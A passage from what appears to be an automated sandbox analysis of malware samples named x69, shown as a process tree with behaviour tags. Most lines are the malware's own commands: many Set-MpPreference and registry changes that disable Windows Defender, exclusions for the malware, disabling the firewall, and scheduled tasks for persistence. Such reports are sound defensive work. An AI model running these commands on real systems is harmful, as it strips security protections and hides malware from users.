                                                                                              C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                              4⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:2700
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\396d7b93.bat" "
                                                                                                5⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5076
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  6⤵
                                                                                                    PID:3964
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\923E.tmp\923E.tmp\924F.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:5072
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2168
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5452
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4704
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5244
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1596
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4400
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4992
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2900
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5904
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4912
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2584
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5300
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1764
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4048
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5240
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                  5⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4388
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                    6⤵
                                                                                                      PID:4348
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                    5⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:388
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                      6⤵
                                                                                                        PID:1744
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                                      5⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2796
                                                                                                      • C:\Windows\system32\netsh.exe
                                                                                                        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                        6⤵
                                                                                                        • Modifies Windows Firewall
                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                        PID:4064
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                      5⤵
                                                                                                        PID:5000
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                        5⤵
                                                                                                        • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                        PID:1740
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                        5⤵
                                                                                                          PID:2412
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                          5⤵
                                                                                                            PID:2972
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                            5⤵
                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                            PID:4808
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                            5⤵
                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                            PID:4216
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                            5⤵
                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                            PID:4916
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                            5⤵
                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                            PID:1852
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                            5⤵
                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                            PID:5876
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                            5⤵
                                                                                                              PID:6072
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                              5⤵
                                                                                                                PID:2020
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                5⤵
                                                                                                                  PID:4816
                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                  5⤵
                                                                                                                    PID:3880
                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                    5⤵
                                                                                                                      PID:4824
                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                      5⤵
                                                                                                                        PID:4660
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                        5⤵
                                                                                                                          PID:3040
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                          5⤵
                                                                                                                            PID:920
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                            5⤵
                                                                                                                              PID:4524
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                              5⤵
                                                                                                                                PID:5580
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                5⤵
                                                                                                                                  PID:4380
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                  5⤵
                                                                                                                                    PID:1944
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                    5⤵
                                                                                                                                      PID:5532
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                      5⤵
                                                                                                                                        PID:2388
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                        5⤵
                                                                                                                                          PID:5540
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                          5⤵
                                                                                                                                            PID:3964
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Security services
                                                                                                                                            PID:3160
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Security services
                                                                                                                                            PID:1984
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Security services
                                                                                                                                            PID:436
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Security services
                                                                                                                                            PID:4340
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                            5⤵
                                                                                                                                            • Modifies security service
                                                                                                                                            PID:2296
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
                                                                                                                                        3⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3268
                                                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                                                        "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
                                                                                                                                        3⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:5584
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\x69install.exe"
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:4588
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                          4⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:4472
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\18f81da6.bat" "
                                                                                                                                            5⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:4812
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:1520
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        3⤵
                                                                                                                                          PID:4984
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                          3⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Drops startup file
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:1008
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                            4⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2508
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
                                                                                                                                            4⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5888
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                            4⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5772
                                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                            PID:4724
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:3576
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                          3⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:4844
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                            4⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:640
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\45fa18db.bat" "
                                                                                                                                              5⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:2716
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                6⤵
                                                                                                                                                  PID:3912
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\923D.tmp\923E.tmp\923F.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:3852
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4852
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3720
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3700
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1276
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2896
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2664
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1576
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4848
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3428
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:948
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3108
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:2664
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1612
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:5664
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1672
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:5584
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                                  6⤵
                                                                                                                                                    PID:5900
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                                  5⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:3744
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5812
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                                                                                    5⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
